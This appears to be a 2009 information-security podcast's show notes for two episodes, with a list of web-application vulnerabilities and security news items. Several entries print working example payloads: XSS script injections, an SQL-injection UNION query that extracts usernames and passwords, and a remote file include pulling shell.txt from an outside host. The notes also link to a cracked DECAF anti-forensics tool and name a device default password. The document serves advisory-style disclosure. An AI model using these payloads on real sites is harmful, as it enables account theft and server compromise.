As we will be partying in the New Year we’ve decided not to do a Podcast today.

InfoSec Podcast Episode 37 for December 30, 2009. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. When your systems are down, as a small and medium-sized businesses the resulting downtime can have a devastating impact.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Goto www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10

Go online to register by going to http://www.sans.org/atlanta-cs-events-2010/?utm_source=web-sans&utm_medium=banner&utm_content=Featured_Community_SANS_atlanta-2010-cs_events&utm_campaign=Community_SANS_Atlanta_2010&ref=52093

or call (301) 654-SANS(7267).

Vulnerabilities of Interest:

1. RoseOnlineCMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input which could be exploited to obtain potentially sensitive information or to execute local scripts. RoseOnlineCMS 3 B1 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/modules/admincp.php?admin=[LFI%00]
2. phpAuction is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data this could lead to execution of script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Example URLs: http://www.example.com/phpauction/register.php?TPL_name=1>”><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com and http://www.example.com/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com&TP
3. The ‘com_adagency’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input which could allow an attacker to potentially obtain sensitive information and execute local scripts in the context of the webserver process. Example URL: http://www.example.com/index.php?option=com_adagency&controller= [-LFI-]
4. The Memory Book component for Joomla! is subject to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability which could allow an attacker to compromise the application, upload files, execute code, access or modify data, or exploit other vulnerabilities in the underlying database. Memory Book 1.2 is vulnerable; other versions may also be affected. All you need is a browser to exploit this vulnerability.
5. DrBenHur.com DBHcms is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input which could allow an attacker to include an file containing malicious PHP code and execute it in the context of the webserver process. This may lead to a compromise of the application and the underlying system; other attacks are also possible. DBHcms 1.1.4 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00
6. UPDATE: Microsoft IIS security-bypass vulnerability was reported to have a vulnerability which could cause IIS to interpret unexpected files as CGI applications. For an exploit to succeed, IIS must be configured in a nondefault way and contrary to the vendor’s recommended best practices.
7. The Q-Personel component for Joomla! is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input which could be leveraged to execute script code in the browser of an unsuspecting user. Q-Personel 1.0.2(RC2) is vulnerable; other versions may be affected as well. Example URL: http://www.example.com/j15x/index.php?option=com_qpersonel&task=sirala&personel_sira=[XSS CODE]
8. Stash is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data which could be leveraged to execute script code in the browser of an unsuspecting user. Stash 1.0.3 is vulnerable; other versions may also be affected. To exploit these issues, an attacker get the victim into following a malicious URL.
9. Calendar Express is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query which could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Example URL: http://www.example.com/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+usi

News item 13:http://www.scmagazineuk.com/mbna-confirms-data-loss-after-laptop-containing-personal-details-of-thousands-of-customers-was-stolen-from-vendor/article/160217/
http://www.net-security.org/secworld.php?id=8656
http://www.lep.co.uk/news/Customer-credit-card-details-stolen.5929370.jp
MBNA is notifying thousands of customers that a laptop stolen from NCO Europe offices contains their credit card information. NCO Europe is a third-party contractor. Although the files do contain personal information, no PINs are believed to be included. While no fraudulent activity has been detected on the compromised accounts, MBNA is offering affected customers one year of credit monitoring service and is monitoring all compromised accounts.

InfoSec Podcast Episode 36 for December 29, 2009. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Vulnerabilities of Interest:

1. APC Switched Rack Power Distribution Units (PDU) is subject to a cross-site scripting vulnerability because the device’s web interface fails to properly sanitize user-supplied input.  This may be leveraged to execute script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.  APC Switched Rack PDU AP7932 is vulnerable; other version may also be affected.Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI. Example URL is available:http://www.example.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
2. The Kleinanzeigenmarkt plugin for Woltlab Burning Board is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could result in a compromise of the application, accessing or modifying data, or exploiting the underlying database. All it takes is a browser to exploit this issue. Exploit code is available in the wild.
3. Pragyan CMS is subject to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.   This could result in compromising the application as well as the potentially the complete system.  Pragyan CMS 2.6.4 is vulnerable; other versions may also be affected. Exploiting these issues is as simple as using a browser and the example URLs: http://www.example.com/cms/modules/search/search.php?moduleFolder=[Evil] and http://www.example.com/cms/modules/search/search.php?sourceFolder=[Evil].
4. Jax Guestbook is subject to an authentication-bypass vulnerability which could allow an attacker to gain administrative access to the affected script and/or make configuration changes.  This could potentially lead to further attacks.  Jax Guestbook 3.50 is vulnerable; other versions may also be affected.  Exploiting these issues is as simple as using a browser and the example URL: http://www.example.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0
5. MyBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input which may be leveraged to execute script code in the browser of a user in the context of the affected site.  This could allow the attacker to steal cookie-based authentication credentials and to launch additional attacks.  MyBB 1.4.10 is vulnerable; other versions may be affected as well. Exploiting this issue requires enticing an user to follow a malicious URL  Example URLs are available: http://www.example.com/myps.php?action=donate&username=”/> and  http://www.example.com/myps.php?action=donate&username=<IMG”"”>”> .
6. The Automated Logout module for Drupal is subject to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.   This may be leveraged to execute script code in the browser of a user in the context of the affected site.   Automated Logout 6.x-1.6, 6.x-2.2 and prior versions are vulnerable.
7. Wireshark is subject to multiple denial-of-service vulnerabilities and a buffer-overflow vulnerability which may allow an attacker to crash the application and deny service to legitimate users. Additionally, there is the possibility that these vulnerabilities could result in the execution of code in the context of users running the application.  These issues affect Wireshark 0.9.0 through 1.2.4. Proof-of-concept capture files for the denial-of-service issues are available from the following locations:  https://bugs.wireshark.org/bugzilla/attachment.cgi?id=4055 and http://www.wireshark.org/download/automated/captures/fuzz-2009-12-07-11141.pcap.
8. The ‘com_schools’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data in the underlying database. Example URL code is available: http://www.example.com/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users–
9. Microsoft IIS is prone to a security-bypass vulnerability that may result in IIS interpreting unexpected files as CGI applications. Attackers may be able to exploit this vulnerability to bypass intended security restrictions.  Reports indicate that IIS 7.5 is not vulnerable to this issue; furthermore, it is currently unknown if IIS 7.0 is vulnerable.

Amazon.com’s Hot Holiday Bestsellers (Nov. 15 through Dec. 19, based on units ordered):

• Electronics: Kindle Wireless Reading Device; Apple iPod touch 8 GB; and Garmin nuvi 260W 4.3-inch GPS
• Toys: Scrabble Slam Cards; The Settlers of Catan; and Scene It? Twilight Deluxe Edition
• Video Games and Hardware: Wii Fit Plus with Balance Board; New Super Mario Bros; and Call of Duty: Modern Warfare 2

News item 2: http://seclists.org/fulldisclosure/2009/Dec/438
As discussed last week, it appears that DECAF was disabled the authors at decafme.org.  Well, it looks like some people over at soldierx.com have patched the binary to re-enable it and remove the phone home functionality. The files are at http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or http://www.multiupload.com/88TEOEYCSZ. Of the sites listed on the multiupload.com site, I had problems with both RapidShare and MegaUpload. The other sites seemed to work well.

News item 3: http://ontheflix.com/2009/12/25/celtics-ray-allen-twitter-account-gets-hacked-sends-naughty-tweets/
It seems that  Celtics shooting guard  Ray Allen’s  Twitter account was hacked & apparently was sending some pretty naughty tweets. The Huffington Post is reporting that tweets such as: “I’m getting there. When you masturbate think about my tongue or your cl*t and switching back and forth from my d**k to my tongue.”

The tweets got deleted later on,and 14 minutes later, another tweet showed up stating an apology,and claiming he was not responsible. It read like this: “I’m sorry my acct was hacked into. I need to changey tweet handle.” Then he changed his Twitter name from @sugarray20 to @greenrayn20.   Ray Allen said he may have to get off “Twitter” if this continues to happen. He tweeted, “i hope that it was amusing to people but im either gonna change my password or stop tweeting altogether.”

News item 4: http://www.wired.com/dangerroom/2009/12/not-just-drones-militants-can-snoop-on-most-us-warplanes/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+wired%2Fpolitics+%28Wired%3A+Politics%29
Wired Magazine is reporting that militants tapping into drones’ video feeds was just the start.   Apparently, the U.S. military’s system for bringing overhead surveillance down to soldiers and Marines on the ground is also vulnerable to electronic interception.  That means militants have the ability to see the video feeds from traditional fighters and bombers to unmanned spy planes. The problem is in the process of being addressed. But for now, an enormous security breach is even larger than previously thought.

So what is to blame?  Apparently, the feeling is that early on units were “fielded so fast that it was done with an unencrypted signal. It could be both intercepted (e.g. hacked into) and jammed”.  The question is why is it taking 10 years to fix the issue?   You’ve got satellite providers in the L, C, S, Ku [satellite] bands that are sending data encrypted.  So it’s not like this is new technology.  What’s the big deal?  Well, imagine trying to ensure that all units in a theater have the correct encryption/decryption keys necessary receive the data they need.  This is really where the issue is.   Do you trust the small units with these keys?  How do you handle key rotation?

News item 5: http://blog.tenablesecurity.com/2009/12/top-10-nessus-plugins-for-2009.html

In 2009, Tenable released over 8,100 new plugins (and the year isn’t over yet!). These plugins have covered several different types of vulnerabilities, including web applications, embedded systems, local checks for operating systems and much more. Tenable polled it’s employees to find some of our favorite plugins released this year,and compiled the following list:

1. DD-WRT HTTP Daemon Metacharacter Injection Remote Code Execution – This vulnerability allows remote attackers to inject commands via a flaw in the HTTP management web application on embedded systems running DD-WRT.
2. Windows Remote Registry Enable/Disable – For remote authenticated checks to run on Windows systems, the remote registry service needs to be enabled. While this may not be a service you wish to run on all your systems, this plugin solves that problem by temporarily enabling and then disabling the remote registry service when the scan has completed.
3. PCI Test Requirements – Back in April of 2009, I wrote a blog posted titled, “PCI DSS Auditing Linux, Apache, PHP & MySQL with Nessus 4″.
4. USB Drives Enumeration – In 2009, over 218 million records fell into the wrong hands due to some form of breach (According to a report generated by DataLossDB). Some of those data loss incidents can be attributed to removable media such as USB thumb drives.
5. Malware Infected Host -  This Nessus plugin will seek out and report on these types of HTTP servers.
6. Dell Remote Access Controller Default Password (calvin) for ‘root’ Account
7. Conficker Detection (uncredentialed check) – Conficker was one of the major malware releases in 2009. This Nessus plugin could detect it on remote systems without using credentials.
8. Backported Security Patches (HTTP) -  This plugins look at Linux distribution banners for common FTP, HTTP and SSH services that seem as if they have not been patched, but are in fact most likely to have been fixed.
9. Microsoft Windows SMB Shares Access – This plugin that keeps on giving! A simple plugin, but one of the most likely to fire during an internal audit where Windows machines are found. The shared drives could contain nothing or they could contain the entire HR database.
10. Enhanced Web Application Testing Plugins – Not a plugin per-se, but bunch of enhanced web app tests that didn’t exist with all the new options before ‘09.

News item 6: http://www.wafb.com/Global/story.asp?S=11661499

A story about a 21-year old being caught on camera is probably nothing new.  Stealing a decoy cameras is probably a little odd.   Having a land owner had set up the decoy cameras to capture the theft of his digital game surveillance cameras is even more odd.   Believe it or not, Dustin Archibald of Denham Springs was caught on camera stealing a camera with a “No Trespassing” sign visible in the background.

Archibald claims that he was not stealing the camera, but  rather taking it so the landowner would not be able to hunt deer in the area. Unfortunately, with the property owner’s photographic evidence from his surveillance cameras,  Archibald was identified right away and he consequentially turned himself into authorities.

The take-away here is that you never know what is watching a device that watches.

Tonight we are joined by a very special guest, Dave Shackleford.  Dave is the Director, Risk & Compliance and Interim Director, Security Assessments at Sword & Shield Enterprise Security, Inc.  (http://www.sses.net).  Additionally, Dave is the SANS Institute GIAC technical director.  Dave is the co-author of Hands-On Information Security from Course Technology as well as the “Managing Incident Response” chapter in the Course Technology book Readings and Cases in the Management of Information Security.  Recently, Dave co-authored the first published course on virtualization security for the SANS Institute.  Dave currently serves on the board of directors at the Technology Association of Georgia’s Information Security Society and the SANS Technology Institute.  Author of the Shackfoo article titled “One for the n00bs“.

Merry Christmas from our family to yours.